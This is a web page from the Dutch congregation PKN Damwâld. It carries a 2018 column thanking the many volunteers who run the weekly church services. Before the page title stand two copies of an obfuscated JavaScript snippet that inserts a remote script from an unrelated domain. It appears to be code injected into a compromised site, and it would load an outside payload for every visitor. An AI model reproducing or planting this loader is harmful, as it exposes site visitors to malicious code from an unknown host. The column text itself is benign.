;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bij de diensten ... - PKN Damwâld

Bij de diensten …

Gepubliceerd op: vrijdag 23 maart 2018

Heeft u weleens om u heen gekeken tijdens een eredienst? Voor velen is de eredienst een moment van rust en dat is goed. Maar als we goed om ons heen kijken, zien we veel mensen die actief zijn. Mensen die voor en tijdens, maar ook na de eredienst helpen en zo de eredienst in goede orde met eer en respect laten verlopen. Daarmee mogen zij allen gezien worden als dienaren van God. Daarbij valt het meest in het oog de voorganger als dienaar van Gods woord. Maar het begint al met het organiseren van de erediensten. De diensten worden gepland, een rooster wordt gemaakt. Predikanten/voorgangers, organisten, ambtsdragers en (hulp-) kosters worden vastgelegd voor de betreffende data. Er wordt met zorg een collecterooster vastgesteld. De voorganger bereidt de dienst voor. Dat geldt ook voor de organist. Er wordt een wekelijkse nieuwsbrief gemaakt. De koster zorgt voor een schone, warme kerk en verzorgt de liederenborden. Er worden bloemen klaargezet en na de dienst worden deze met een groet van de gemeente bij een gemeentelid bezorgd. Bij binnenkomst wordt u verwelkomd door mensen de koster. Er ligt een Bijbel en een liedboek voor u klaar als u die toevallig vergeten bent en ook is een uitgewerkte liturgie beschikbaar, die in elke vrijdag met de nieuwsbrief keurig wordt bezorgd bij hen die dat behoeven. Onderwijl speelt het orgel al en zorgt de organist voor de muzikale begeleiding van de eredienst. Er wordt gezorgd voor het goed afstellen van de geluidsinstallatie en de geluidsopname van de dienst wordt klaargezet. We kennen natuurlijk al het beamerteam die wekelijks de beamerpresentatie verzorgd tijdens de viering of bij een andere aangelegenheid. De liturgie, de liederen, een passend filmpje, mededelingen, we laten het allemaal zien via de beamer! De ouderling van dienst controleert de gang van zaken en stemt zo nodig nog het één en ander af. De leiding van de KingKids/Berne Tjerke/Tienerkerk heeft ook de eigen dienst voorbereid en brengt Gods boodschap over aan de kinderen. De oppassers van de crèche zorgen goed voor de allerkleinsten tijdens de dienst. In de consistorie wordt het consistoriegebed uitgesproken en een zegen gevraagd voor de dienst. Na de afkondigingen draagt de ouderling van dienst de regie van de dienst over aan de voorganger. De voorganger verzorgt de gebeden en verkondiging en brengt ons het Evangelie en God de eer. Aan het einde van de dienst geeft de ouderling van dienst de voorganger een hand, neemt als het ware de regie weer over. We begroeten elkaar bij het verlaten van de kerk. Na de dienst wordt de collecte geteld en regelmatig is er na de dienst tijd voor ontmoeting en wordt er koffie en thee geschonken. De geluidsopname wordt bezorgd bij belangstellenden die zelf de dienst niet kunnen bezoeken. Al met al een lange lijst met veel activiteiten en misschien ben ik zelfs nog wel iets vergeten. Dat elke week zoveel mensen hier tijd voor maken, daar mogen we dankbaar voor zijn. We mogen ervan overtuigd zijn dat God al dit werk wil zegenen en dat we Hem hiermee de eer brengen, zoals Hij dat graag van ons ziet. Goede diensten gewenst !

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns